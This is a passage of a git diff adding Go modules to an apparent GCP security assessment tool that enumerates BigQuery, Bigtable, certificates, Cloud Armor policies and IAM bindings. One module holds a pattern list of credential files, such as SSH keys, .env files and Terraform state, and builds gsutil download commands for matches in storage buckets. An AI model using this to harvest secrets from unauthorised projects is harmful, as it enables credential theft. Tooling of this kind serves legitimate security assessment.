string, datasetID string) ([ break } if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") } meta, err := table.Metadata(ctx) if err != nil { - return nil, err - } - tables = append(tables, BigqueryTable{ - TableID: table.TableID, - DatasetID: datasetID, - Location: meta.Location, - CreationTime: meta.CreationTime, - LastModifiedTime: meta.LastModifiedTime, - NumBytes: meta.NumBytes, - Description: meta.Description, - ProjectID: projectID, - }) + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") + } + + tbl := BigqueryTable{ + TableID: table.TableID, + DatasetID: datasetID, + ProjectID: projectID, + Location: meta.Location, + FullID: meta.FullID, + Description: meta.Description, + TableType: tableTypeToString(meta.Type), + CreationTime: meta.CreationTime, + LastModifiedTime: meta.LastModifiedTime, + ExpirationTime: meta.ExpirationTime, + NumBytes: meta.NumBytes, + NumLongTermBytes: meta.NumLongTermBytes, + NumRows: meta.NumRows, + Labels: meta.Labels, + RequirePartitionFilter: meta.RequirePartitionFilter, + } + + // Parse encryption + if meta.EncryptionConfig != nil && meta.EncryptionConfig.KMSKeyName != "" { + tbl.EncryptionType = "CMEK" + tbl.KMSKeyName = meta.EncryptionConfig.KMSKeyName + } else { + tbl.EncryptionType = "Google-managed" + } + + // Parse partitioning + if meta.TimePartitioning != nil { + tbl.IsPartitioned = true + tbl.PartitioningType = "TIME" + } else if meta.RangePartitioning != nil { + tbl.IsPartitioned = true + tbl.PartitioningType = "RANGE" + } + + // Parse view info + if meta.ViewQuery != "" { + tbl.IsView = true + tbl.ViewQuery = meta.ViewQuery + tbl.UseLegacySQL = meta.UseLegacySQL + } + + // Check for streaming buffer + if meta.StreamingBuffer != nil { + tbl.HasStreamingBuffer = true + } + + // Get table-level IAM policy + if apiService != nil { + iamBindings, isPublic, publicAccess := bq.getTableIAMPolicy(ctx, apiService, projectID, datasetID, table.TableID) + 
tbl.IAMBindings = iamBindings + tbl.IsPublic = isPublic + tbl.PublicAccess = publicAccess + } + + tables = append(tables, tbl) } return tables, nil } + +// getTableIAMPolicy retrieves IAM policy for a specific table +func (bq *BigQueryService) getTableIAMPolicy(ctx context.Context, apiService *bqapi.Service, projectID, datasetID, tableID string) ([]TableIAMBinding, bool, string) { + var bindings []TableIAMBinding + isPublic := false + hasAllUsers := false + hasAllAuthenticatedUsers := false + + resource := fmt.Sprintf("projects/%s/datasets/%s/tables/%s", projectID, datasetID, tableID) + policy, err := apiService.Tables.GetIamPolicy(resource, &bqapi.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + // IAM not available or permission denied - return empty + return bindings, false, "None" + } + + for _, binding := range policy.Bindings { + iamBinding := TableIAMBinding{ + Role: binding.Role, + Members: binding.Members, + } + bindings = append(bindings, iamBinding) + + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" { + hasAllUsers = true + isPublic = true + } + if member == "allAuthenticatedUsers" { + hasAllAuthenticatedUsers = true + isPublic = true + } + } + } + + // Determine public access level + publicAccess := "None" + if hasAllUsers && hasAllAuthenticatedUsers { + publicAccess = "allUsers + allAuthenticatedUsers" + } else if hasAllUsers { + publicAccess = "allUsers" + } else if hasAllAuthenticatedUsers { + publicAccess = "allAuthenticatedUsers" + } + + return bindings, isPublic, publicAccess +} + +// tableTypeToString converts BigQuery TableType to a readable string +func tableTypeToString(tt bigquery.TableType) string { + switch tt { + case bigquery.RegularTable: + return "TABLE" + case bigquery.ViewTable: + return "VIEW" + case bigquery.ExternalTable: + return "EXTERNAL" + case bigquery.MaterializedView: + return "MATERIALIZED_VIEW" + case bigquery.Snapshot: + return "SNAPSHOT" + default: + return 
"UNKNOWN" + } +} + +// GetMemberType extracts the member type from entity info +func GetMemberType(entityType string, entity string) string { + switch entityType { + case "User": + return "User" + case "Group": + return "Group" + case "Domain": + return "Domain" + case "SpecialGroup": + if strings.Contains(strings.ToLower(entity), "allusers") { + return "PUBLIC" + } + if strings.Contains(strings.ToLower(entity), "allauthenticatedusers") { + return "ALL_AUTHENTICATED" + } + return "SpecialGroup" + case "IAMMember": + if strings.HasPrefix(entity, "serviceAccount:") { + return "ServiceAccount" + } + if strings.HasPrefix(entity, "user:") { + return "User" + } + if strings.HasPrefix(entity, "group:") { + return "Group" + } + return "IAMMember" + case "View": + return "AuthorizedView" + case "Routine": + return "AuthorizedRoutine" + case "Dataset": + return "AuthorizedDataset" + default: + return "Unknown" + } +} diff --git a/gcp/services/bigtableService/bigtableService.go b/gcp/services/bigtableService/bigtableService.go new file mode 100644 index 00000000..6bd4e6fe --- /dev/null +++ b/gcp/services/bigtableService/bigtableService.go @@ -0,0 +1,163 @@ +package bigtableservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + bigtableadmin "google.golang.org/api/bigtableadmin/v2" +) + +type BigtableService struct { + session *gcpinternal.SafeSession +} + +func New() *BigtableService { + return &BigtableService{} +} + +type BigtableInstanceInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + DisplayName string `json:"displayName"` + Type string `json:"type"` + State string `json:"state"` + Clusters []ClusterInfo `json:"clusters"` + IAMBindings []IAMBinding `json:"iamBindings"` + PublicAccess bool `json:"publicAccess"` +} + +type BigtableTableInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + InstanceName string 
`json:"instanceName"` + ProjectID string `json:"projectId"` + IAMBindings []IAMBinding `json:"iamBindings"` + PublicAccess bool `json:"publicAccess"` +} + +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} + +type ClusterInfo struct { + Name string `json:"name"` + Location string `json:"location"` + ServeNodes int64 `json:"serveNodes"` + State string `json:"state"` +} + +type BigtableResult struct { + Instances []BigtableInstanceInfo + Tables []BigtableTableInfo +} + +func (s *BigtableService) ListInstances(projectID string) (*BigtableResult, error) { + ctx := context.Background() + service, err := bigtableadmin.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigtableadmin.googleapis.com") + } + + result := &BigtableResult{ + Instances: []BigtableInstanceInfo{}, + Tables: []BigtableTableInfo{}, + } + + parent := fmt.Sprintf("projects/%s", projectID) + + resp, err := service.Projects.Instances.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigtableadmin.googleapis.com") + } + + for _, instance := range resp.Instances { + info := BigtableInstanceInfo{ + Name: extractName(instance.Name), + FullName: instance.Name, + ProjectID: projectID, + DisplayName: instance.DisplayName, + Type: instance.Type, + State: instance.State, + } + + // Get clusters + clustersResp, _ := service.Projects.Instances.Clusters.List(instance.Name).Context(ctx).Do() + if clustersResp != nil { + for _, cluster := range clustersResp.Clusters { + info.Clusters = append(info.Clusters, ClusterInfo{ + Name: extractName(cluster.Name), + Location: cluster.Location, + ServeNodes: cluster.ServeNodes, + State: cluster.State, + }) + } + } + + // Get tables and their IAM policies + tablesResp, _ := service.Projects.Instances.Tables.List(instance.Name).Context(ctx).Do() + if tablesResp != nil { + for _, table := range tablesResp.Tables { + tableInfo := BigtableTableInfo{ + Name: 
extractName(table.Name), + FullName: table.Name, + InstanceName: info.Name, + ProjectID: projectID, + } + + // Get IAM policy for table + tableIamResp, err := service.Projects.Instances.Tables.GetIamPolicy(table.Name, &bigtableadmin.GetIamPolicyRequest{}).Context(ctx).Do() + if err == nil && tableIamResp != nil { + for _, binding := range tableIamResp.Bindings { + tableInfo.IAMBindings = append(tableInfo.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + } + tableInfo.PublicAccess = checkPublicAccess(tableIamResp.Bindings) + } + + result.Tables = append(result.Tables, tableInfo) + } + } + + // Get IAM policy for instance + iamResp, err := service.Projects.Instances.GetIamPolicy(instance.Name, &bigtableadmin.GetIamPolicyRequest{}).Context(ctx).Do() + if err == nil && iamResp != nil { + for _, binding := range iamResp.Bindings { + info.IAMBindings = append(info.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + } + info.PublicAccess = checkPublicAccess(iamResp.Bindings) + } + + result.Instances = append(result.Instances, info) + } + + return result, nil +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// checkPublicAccess checks if any IAM binding grants access to allUsers or allAuthenticatedUsers +func checkPublicAccess(bindings []*bigtableadmin.Binding) bool { + for _, binding := range bindings { + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + return true + } + } + } + return false +} diff --git a/gcp/services/bucketEnumService/bucketEnumService.go b/gcp/services/bucketEnumService/bucketEnumService.go new file mode 100644 index 00000000..c9f5e02b --- /dev/null +++ b/gcp/services/bucketEnumService/bucketEnumService.go @@ -0,0 +1,299 @@ +package bucketenumservice + +import ( + "context" + "fmt" + "path/filepath" + "strings" + + 
gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "google.golang.org/api/iterator" + "google.golang.org/api/storage/v1" +) + +type BucketEnumService struct { + session *gcpinternal.SafeSession +} + +func New() *BucketEnumService { + return &BucketEnumService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *BucketEnumService { + return &BucketEnumService{session: session} +} + +// SensitiveFileInfo represents a potentially sensitive file in a bucket +type SensitiveFileInfo struct { + BucketName string `json:"bucketName"` + ObjectName string `json:"objectName"` + ProjectID string `json:"projectId"` + Size int64 `json:"size"` + ContentType string `json:"contentType"` + Category string `json:"category"` // credential, secret, config, backup, etc. + RiskLevel string `json:"riskLevel"` // CRITICAL, HIGH, MEDIUM, LOW + Description string `json:"description"` // Why it's sensitive + DownloadCmd string `json:"downloadCmd"` // gsutil command to download + Updated string `json:"updated"` + StorageClass string `json:"storageClass"` + IsPublic bool `json:"isPublic"` // Whether the object has public access +} + +// SensitivePatterns defines patterns to search for sensitive files +type SensitivePattern struct { + Pattern string + Category string + RiskLevel string + Description string +} + +// GetSensitivePatterns returns all patterns to check for sensitive files +func GetSensitivePatterns() []SensitivePattern { + return []SensitivePattern{ + // Credentials - CRITICAL + {Pattern: ".json", Category: "Credential", RiskLevel: "CRITICAL", Description: "Service account key file"}, + {Pattern: "credentials.json", Category: "Credential", RiskLevel: "CRITICAL", Description: "GCP credentials file"}, + {Pattern: "service-account", Category: "Credential", RiskLevel: "CRITICAL", Description: "Service account key"}, + {Pattern: "keyfile", Category: "Credential", RiskLevel: "CRITICAL", Description: "Key file"}, + {Pattern: ".pem", Category: "Credential", RiskLevel: 
"CRITICAL", Description: "PEM private key"}, + {Pattern: ".key", Category: "Credential", RiskLevel: "CRITICAL", Description: "Private key file"}, + {Pattern: ".p12", Category: "Credential", RiskLevel: "CRITICAL", Description: "PKCS12 key file"}, + {Pattern: ".pfx", Category: "Credential", RiskLevel: "CRITICAL", Description: "PFX certificate file"}, + {Pattern: "id_rsa", Category: "Credential", RiskLevel: "CRITICAL", Description: "SSH private key"}, + {Pattern: "id_ed25519", Category: "Credential", RiskLevel: "CRITICAL", Description: "SSH private key (ed25519)"}, + {Pattern: "id_ecdsa", Category: "Credential", RiskLevel: "CRITICAL", Description: "SSH private key (ECDSA)"}, + + // Secrets - CRITICAL/HIGH + {Pattern: ".env", Category: "Secret", RiskLevel: "CRITICAL", Description: "Environment variables (may contain secrets)"}, + {Pattern: "secrets", Category: "Secret", RiskLevel: "HIGH", Description: "Secrets file or directory"}, + {Pattern: "password", Category: "Secret", RiskLevel: "HIGH", Description: "Password file"}, + {Pattern: "api_key", Category: "Secret", RiskLevel: "HIGH", Description: "API key file"}, + {Pattern: "apikey", Category: "Secret", RiskLevel: "HIGH", Description: "API key file"}, + {Pattern: "token", Category: "Secret", RiskLevel: "HIGH", Description: "Token file"}, + {Pattern: "auth", Category: "Secret", RiskLevel: "HIGH", Description: "Authentication file"}, + {Pattern: ".htpasswd", Category: "Secret", RiskLevel: "HIGH", Description: "HTTP password file"}, + {Pattern: ".netrc", Category: "Secret", RiskLevel: "HIGH", Description: "FTP/other credentials"}, + + // Config files - HIGH/MEDIUM + {Pattern: "config", Category: "Config", RiskLevel: "MEDIUM", Description: "Configuration file"}, + {Pattern: ".yaml", Category: "Config", RiskLevel: "MEDIUM", Description: "YAML config (may contain secrets)"}, + {Pattern: ".yml", Category: "Config", RiskLevel: "MEDIUM", Description: "YAML config (may contain secrets)"}, + {Pattern: "application.properties", 
Category: "Config", RiskLevel: "HIGH", Description: "Java app config"}, + {Pattern: "web.config", Category: "Config", RiskLevel: "HIGH", Description: ".NET config"}, + {Pattern: "appsettings.json", Category: "Config", RiskLevel: "HIGH", Description: ".NET app settings"}, + {Pattern: "settings.py", Category: "Config", RiskLevel: "HIGH", Description: "Django settings"}, + {Pattern: "database.yml", Category: "Config", RiskLevel: "HIGH", Description: "Rails database config"}, + {Pattern: "wp-config.php", Category: "Config", RiskLevel: "HIGH", Description: "WordPress config"}, + {Pattern: ".npmrc", Category: "Config", RiskLevel: "HIGH", Description: "NPM config (may contain tokens)"}, + {Pattern: ".dockercfg", Category: "Config", RiskLevel: "HIGH", Description: "Docker registry credentials"}, + {Pattern: "docker-compose", Category: "Config", RiskLevel: "MEDIUM", Description: "Docker compose config"}, + {Pattern: "terraform.tfstate", Category: "Config", RiskLevel: "CRITICAL", Description: "Terraform state (contains secrets)"}, + {Pattern: ".tfstate", Category: "Config", RiskLevel: "CRITICAL", Description: "Terraform state file"}, + {Pattern: "terraform.tfvars", Category: "Config", RiskLevel: "HIGH", Description: "Terraform variables"}, + {Pattern: "kubeconfig", Category: "Config", RiskLevel: "CRITICAL", Description: "Kubernetes config"}, + {Pattern: ".kube/config", Category: "Config", RiskLevel: "CRITICAL", Description: "Kubernetes config"}, + + // Backups - HIGH + {Pattern: ".sql", Category: "Backup", RiskLevel: "HIGH", Description: "SQL database dump"}, + {Pattern: ".dump", Category: "Backup", RiskLevel: "HIGH", Description: "Database dump"}, + {Pattern: ".bak", Category: "Backup", RiskLevel: "MEDIUM", Description: "Backup file"}, + {Pattern: "backup", Category: "Backup", RiskLevel: "MEDIUM", Description: "Backup file/directory"}, + {Pattern: ".tar.gz", Category: "Backup", RiskLevel: "MEDIUM", Description: "Compressed archive"}, + {Pattern: ".zip", Category: "Backup", 
RiskLevel: "MEDIUM", Description: "ZIP archive"}, + + // Source code - MEDIUM + {Pattern: ".git", Category: "Source", RiskLevel: "MEDIUM", Description: "Git repository data"}, + {Pattern: "source", Category: "Source", RiskLevel: "LOW", Description: "Source code"}, + + // Logs - LOW (but may contain sensitive data) + {Pattern: ".log", Category: "Log", RiskLevel: "LOW", Description: "Log file (may contain sensitive data)"}, + {Pattern: "access.log", Category: "Log", RiskLevel: "MEDIUM", Description: "Access log"}, + {Pattern: "error.log", Category: "Log", RiskLevel: "MEDIUM", Description: "Error log"}, + + // Cloud-specific + {Pattern: "cloudfunctions", Category: "Cloud", RiskLevel: "MEDIUM", Description: "Cloud Functions source"}, + {Pattern: "gcf-sources", Category: "Cloud", RiskLevel: "MEDIUM", Description: "Cloud Functions source bucket"}, + {Pattern: "cloud-build", Category: "Cloud", RiskLevel: "MEDIUM", Description: "Cloud Build artifacts"}, + {Pattern: "artifacts", Category: "Cloud", RiskLevel: "LOW", Description: "Build artifacts"}, + } +} + +// EnumerateBucketSensitiveFiles lists potentially sensitive files in a bucket +func (s *BucketEnumService) EnumerateBucketSensitiveFiles(bucketName, projectID string, maxObjects int) ([]SensitiveFileInfo, error) { + ctx := context.Background() + var storageService *storage.Service + var err error + + if s.session != nil { + storageService, err = storage.NewService(ctx, s.session.GetClientOption()) + } else { + storageService, err = storage.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + var sensitiveFiles []SensitiveFileInfo + patterns := GetSensitivePatterns() + + // List objects in the bucket + req := storageService.Objects.List(bucketName) + if maxObjects > 0 { + req = req.MaxResults(int64(maxObjects)) + } + + err = req.Pages(ctx, func(objects *storage.Objects) error { + for _, obj := range objects.Items { + // Check against sensitive patterns + if 
info := s.checkObjectSensitivity(obj, bucketName, projectID, patterns); info != nil { + sensitiveFiles = append(sensitiveFiles, *info) + } + } + return nil + }) + + if err != nil && err != iterator.Done { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + return sensitiveFiles, nil +} + +func (s *BucketEnumService) checkObjectSensitivity(obj *storage.Object, bucketName, projectID string, patterns []SensitivePattern) *SensitiveFileInfo { + if obj == nil { + return nil + } + + name := strings.ToLower(obj.Name) + ext := strings.ToLower(filepath.Ext(obj.Name)) + baseName := strings.ToLower(filepath.Base(obj.Name)) + + // Check each pattern + for _, pattern := range patterns { + matched := false + patternLower := strings.ToLower(pattern.Pattern) + + // Check extension match + if strings.HasPrefix(patternLower, ".") && ext == patternLower { + matched = true + } + // Check name contains pattern + if strings.Contains(name, patternLower) { + matched = true + } + // Check base name match + if strings.Contains(baseName, patternLower) { + matched = true + } + + if matched { + // Additional filtering for common false positives + if s.isFalsePositive(obj.Name, pattern) { + continue + } + + // Check if object has public access via ACLs + isPublic := s.isObjectPublic(obj) + + return &SensitiveFileInfo{ + BucketName: bucketName, + ObjectName: obj.Name, + ProjectID: projectID, + Size: int64(obj.Size), + ContentType: obj.ContentType, + Category: pattern.Category, + RiskLevel: pattern.RiskLevel, + Description: pattern.Description, + DownloadCmd: fmt.Sprintf("gsutil cp gs://%s/%s .", bucketName, obj.Name), + Updated: obj.Updated, + StorageClass: obj.StorageClass, + IsPublic: isPublic, + } + } + } + + return nil +} + +// isObjectPublic checks if an object has public access via ACLs +func (s *BucketEnumService) isObjectPublic(obj *storage.Object) bool { + if obj == nil || obj.Acl == nil { + return false + } + + for _, acl := range obj.Acl { + // Check for 
public access entities + if acl.Entity == "allUsers" || acl.Entity == "allAuthenticatedUsers" { + return true + } + } + + return false +} + +func (s *BucketEnumService) isFalsePositive(objectName string, pattern SensitivePattern) bool { + nameLower := strings.ToLower(objectName) + + // Filter out common false positives + falsePositivePaths := []string{ + "node_modules/", + "vendor/", + ".git/objects/", + "__pycache__/", + "dist/", + "build/", + } + + for _, fp := range falsePositivePaths { + if strings.Contains(nameLower, fp) { + return true + } + } + + // JSON files that are likely not credentials + if pattern.Pattern == ".json" { + // Only flag if it looks like a service account or credential + if !strings.Contains(nameLower, "service") && + !strings.Contains(nameLower, "account") && + !strings.Contains(nameLower, "credential") && + !strings.Contains(nameLower, "key") && + !strings.Contains(nameLower, "secret") && + !strings.Contains(nameLower, "auth") { + return true + } + } + + // Filter very small files (likely empty or not useful) + // This would need to be checked at the object level + + return false +} + +// GetBucketsList lists all buckets in a project +func (s *BucketEnumService) GetBucketsList(projectID string) ([]string, error) { + ctx := context.Background() + var storageService *storage.Service + var err error + + if s.session != nil { + storageService, err = storage.NewService(ctx, s.session.GetClientOption()) + } else { + storageService, err = storage.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + var buckets []string + err = storageService.Buckets.List(projectID).Pages(ctx, func(bucketList *storage.Buckets) error { + for _, bucket := range bucketList.Items { + buckets = append(buckets, bucket.Name) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + return buckets, nil +} diff --git 
a/gcp/services/certManagerService/certManagerService.go b/gcp/services/certManagerService/certManagerService.go new file mode 100644 index 00000000..0286aa00 --- /dev/null +++ b/gcp/services/certManagerService/certManagerService.go @@ -0,0 +1,272 @@ +package certmanagerservice + +import ( + "context" + "fmt" + "strings" + "time" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + certificatemanager "google.golang.org/api/certificatemanager/v1" + compute "google.golang.org/api/compute/v1" +) + +type CertManagerService struct{} + +func New() *CertManagerService { + return &CertManagerService{} +} + +// Certificate represents an SSL/TLS certificate +type Certificate struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + Type string `json:"type"` // SELF_MANAGED, GOOGLE_MANAGED + Domains []string `json:"domains"` + ExpireTime string `json:"expireTime"` + DaysUntilExpiry int `json:"daysUntilExpiry"` + State string `json:"state"` + IssuanceState string `json:"issuanceState"` + AttachedTo []string `json:"attachedTo"` // LBs or other resources + Wildcard bool `json:"wildcard"` + Expired bool `json:"expired"` + SelfManaged bool `json:"selfManaged"` +} + +// SSLCertificate represents a compute SSL certificate (classic) +type SSLCertificate struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Type string `json:"type"` // SELF_MANAGED, MANAGED + Domains []string `json:"domains"` + ExpireTime string `json:"expireTime"` + DaysUntilExpiry int `json:"daysUntilExpiry"` + CreationTime string `json:"creationTime"` + Wildcard bool `json:"wildcard"` + Expired bool `json:"expired"` + SelfManaged bool `json:"selfManaged"` +} + +// CertificateMap represents a Certificate Manager certificate map +type CertificateMap struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + EntryCount int `json:"entryCount"` + Certificates []string 
`json:"certificates"` +} + +// GetCertificates retrieves Certificate Manager certificates +func (s *CertManagerService) GetCertificates(projectID string) ([]Certificate, error) { + ctx := context.Background() + service, err := certificatemanager.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "certificatemanager.googleapis.com") + } + + var certificates []Certificate + + // List certificates in all locations (global and regional) + locations := []string{"global"} + + for _, location := range locations { + parent := fmt.Sprintf("projects/%s/locations/%s", projectID, location) + resp, err := service.Projects.Locations.Certificates.List(parent).Context(ctx).Do() + if err != nil { + continue // May not have permissions or no certificates + } + + for _, cert := range resp.Certificates { + c := Certificate{ + Name: extractNameFromPath(cert.Name), + ProjectID: projectID, + Location: location, + Domains: cert.SanDnsnames, + } + + // Determine type and state + if cert.Managed != nil { + c.Type = "GOOGLE_MANAGED" + c.State = cert.Managed.State + c.IssuanceState = cert.Managed.State + } else if cert.SelfManaged != nil { + c.Type = "SELF_MANAGED" + c.State = "ACTIVE" // Self-managed certs are active if they exist + c.SelfManaged = true + } + + // Parse expiration + if cert.ExpireTime != "" { + c.ExpireTime = cert.ExpireTime + expTime, err := time.Parse(time.RFC3339, cert.ExpireTime) + if err == nil { + c.DaysUntilExpiry = int(time.Until(expTime).Hours() / 24) + c.Expired = c.DaysUntilExpiry < 0 + } + } + + // Check for wildcard domains + for _, domain := range c.Domains { + if strings.HasPrefix(domain, "*") { + c.Wildcard = true + break + } + } + + certificates = append(certificates, c) + } + } + + return certificates, nil +} + +// GetSSLCertificates retrieves classic Compute Engine SSL certificates +func (s *CertManagerService) GetSSLCertificates(projectID string) ([]SSLCertificate, error) { + ctx := context.Background() + service, err := 
compute.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var certificates []SSLCertificate + + // Global SSL certificates + resp, err := service.SslCertificates.List(projectID).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + for _, cert := range resp.Items { + c := SSLCertificate{ + Name: cert.Name, + ProjectID: projectID, + Type: cert.Type, + CreationTime: cert.CreationTimestamp, + SelfManaged: cert.Type == "SELF_MANAGED", + } + + // Get domains from managed certificate + if cert.Managed != nil { + c.Domains = cert.Managed.Domains + } + + // Parse expiration + if cert.ExpireTime != "" { + c.ExpireTime = cert.ExpireTime + expTime, err := time.Parse(time.RFC3339, cert.ExpireTime) + if err == nil { + c.DaysUntilExpiry = int(time.Until(expTime).Hours() / 24) + c.Expired = c.DaysUntilExpiry < 0 + } + } + + // Check for wildcard domains + for _, domain := range c.Domains { + if strings.HasPrefix(domain, "*") { + c.Wildcard = true + break + } + } + + certificates = append(certificates, c) + } + + // Regional SSL certificates + regionsResp, err := service.Regions.List(projectID).Context(ctx).Do() + if err == nil { + for _, region := range regionsResp.Items { + regionalCerts, err := service.RegionSslCertificates.List(projectID, region.Name).Context(ctx).Do() + if err != nil { + continue + } + + for _, cert := range regionalCerts.Items { + c := SSLCertificate{ + Name: fmt.Sprintf("%s (%s)", cert.Name, region.Name), + ProjectID: projectID, + Type: cert.Type, + CreationTime: cert.CreationTimestamp, + SelfManaged: cert.Type == "SELF_MANAGED", + } + + if cert.Managed != nil { + c.Domains = cert.Managed.Domains + } + + if cert.ExpireTime != "" { + c.ExpireTime = cert.ExpireTime + expTime, err := time.Parse(time.RFC3339, cert.ExpireTime) + if err == nil { + c.DaysUntilExpiry = int(time.Until(expTime).Hours() / 24) + c.Expired = c.DaysUntilExpiry < 0 + 
} + } + + // Check for wildcard domains + for _, domain := range c.Domains { + if strings.HasPrefix(domain, "*") { + c.Wildcard = true + break + } + } + + certificates = append(certificates, c) + } + } + } + + return certificates, nil +} + +// GetCertificateMaps retrieves certificate maps +func (s *CertManagerService) GetCertificateMaps(projectID string) ([]CertificateMap, error) { + ctx := context.Background() + service, err := certificatemanager.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "certificatemanager.googleapis.com") + } + + var maps []CertificateMap + + locations := []string{"global"} + + for _, location := range locations { + parent := fmt.Sprintf("projects/%s/locations/%s", projectID, location) + resp, err := service.Projects.Locations.CertificateMaps.List(parent).Context(ctx).Do() + if err != nil { + continue + } + + for _, certMap := range resp.CertificateMaps { + cm := CertificateMap{ + Name: extractNameFromPath(certMap.Name), + ProjectID: projectID, + Location: location, + } + + // Get entries for this map + entriesResp, err := service.Projects.Locations.CertificateMaps.CertificateMapEntries.List(certMap.Name).Context(ctx).Do() + if err == nil { + cm.EntryCount = len(entriesResp.CertificateMapEntries) + for _, entry := range entriesResp.CertificateMapEntries { + for _, certRef := range entry.Certificates { + cm.Certificates = append(cm.Certificates, extractNameFromPath(certRef)) + } + } + } + + maps = append(maps, cm) + } + } + + return maps, nil +} + +func extractNameFromPath(path string) string { + parts := strings.Split(path, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return path +} diff --git a/gcp/services/cloudArmorService/cloudArmorService.go b/gcp/services/cloudArmorService/cloudArmorService.go new file mode 100644 index 00000000..473d8fc9 --- /dev/null +++ b/gcp/services/cloudArmorService/cloudArmorService.go @@ -0,0 +1,244 @@ +package cloudarmorservice + +import ( + "context" + "fmt" + 
"strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + compute "google.golang.org/api/compute/v1" +) + +type CloudArmorService struct{} + +func New() *CloudArmorService { + return &CloudArmorService{} +} + +// SecurityPolicy represents a Cloud Armor security policy +type SecurityPolicy struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Description string `json:"description"` + Type string `json:"type"` // CLOUD_ARMOR, CLOUD_ARMOR_EDGE, CLOUD_ARMOR_NETWORK + RuleCount int `json:"ruleCount"` + Rules []SecurityRule `json:"rules"` + AdaptiveProtection bool `json:"adaptiveProtection"` + DDOSProtection string `json:"ddosProtection"` + AttachedResources []string `json:"attachedResources"` + Weaknesses []string `json:"weaknesses"` +} + +// SecurityRule represents a rule within a security policy +type SecurityRule struct { + Priority int64 `json:"priority"` + Description string `json:"description"` + Action string `json:"action"` // allow, deny, redirect, rate_based_ban, throttle + Match string `json:"match"` // Simplified match expression + Preview bool `json:"preview"` + RateLimitConfig *RateLimitInfo `json:"rateLimitConfig,omitempty"` +} + +// RateLimitInfo contains rate limiting configuration +type RateLimitInfo struct { + ThresholdCount int64 `json:"thresholdCount"` + IntervalSec int64 `json:"intervalSec"` + ExceedAction string `json:"exceedAction"` +} + +// GetSecurityPolicies retrieves all Cloud Armor security policies +func (s *CloudArmorService) GetSecurityPolicies(projectID string) ([]SecurityPolicy, error) { + ctx := context.Background() + service, err := compute.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var policies []SecurityPolicy + + // List security policies + resp, err := service.SecurityPolicies.List(projectID).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + for _, policy := 
range resp.Items { + sp := SecurityPolicy{ + Name: policy.Name, + ProjectID: projectID, + Description: policy.Description, + Type: policy.Type, + RuleCount: len(policy.Rules), + Rules: []SecurityRule{}, + AttachedResources: []string{}, + Weaknesses: []string{}, + } + + // Check adaptive protection + if policy.AdaptiveProtectionConfig != nil && + policy.AdaptiveProtectionConfig.Layer7DdosDefenseConfig != nil { + sp.AdaptiveProtection = policy.AdaptiveProtectionConfig.Layer7DdosDefenseConfig.Enable + } + + // Check DDoS protection + if policy.DdosProtectionConfig != nil { + sp.DDOSProtection = policy.DdosProtectionConfig.DdosProtection + } + + // Parse rules + for _, rule := range policy.Rules { + sr := SecurityRule{ + Priority: rule.Priority, + Description: rule.Description, + Action: rule.Action, + Preview: rule.Preview, + } + + // Parse match expression + if rule.Match != nil { + if rule.Match.Expr != nil { + sr.Match = rule.Match.Expr.Expression + } else if rule.Match.VersionedExpr != "" { + sr.Match = rule.Match.VersionedExpr + } else if rule.Match.Config != nil { + // Source IP ranges + if len(rule.Match.Config.SrcIpRanges) > 0 { + sr.Match = fmt.Sprintf("srcIpRanges: %s", strings.Join(rule.Match.Config.SrcIpRanges, ", ")) + } + } + } + + // Rate limit config + if rule.RateLimitOptions != nil { + sr.RateLimitConfig = &RateLimitInfo{ + ExceedAction: rule.RateLimitOptions.ExceedAction, + } + if rule.RateLimitOptions.RateLimitThreshold != nil { + sr.RateLimitConfig.ThresholdCount = rule.RateLimitOptions.RateLimitThreshold.Count + sr.RateLimitConfig.IntervalSec = rule.RateLimitOptions.RateLimitThreshold.IntervalSec + } + } + + sp.Rules = append(sp.Rules, sr) + } + + // Find attached resources (backend services using this policy) + sp.AttachedResources = s.findAttachedResources(ctx, service, projectID, policy.Name) + + // Analyze for weaknesses + sp.Weaknesses = s.analyzePolicy(sp) + + policies = append(policies, sp) + } + + return policies, nil +} + +// 
